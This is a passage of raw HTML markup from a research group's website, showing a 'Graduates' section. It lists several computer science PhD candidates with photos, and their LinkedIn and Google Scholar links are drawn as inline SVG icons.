href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c61\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c61 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c128\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c128 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c129-outer\">\n            <div data-colibri-id=\"182-c129\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c129 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-862 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c62\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c62 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c63-outer\">\n            <div data-colibri-id=\"182-c63\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c63 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c64\" class=\"d-block style-854 style-local-182-c64 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\" class=\"wp-image-1659 style-854-image style-local-182-c64-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c64-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c65\" class=\"h-global-transition-all h-heading style-850 style-local-182-c65 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c65\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c66\" class=\"h-text h-text-component style-851 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c67\" class=\"h-text h-text-component style-902 style-local-182-c67 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c68\" class=\"style-855 style-local-182-c68 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-849 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-901 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-853 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-856 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-852 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-857 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-854 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/anupam.jpg\" class=\"wp-image-1624 style-854-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text 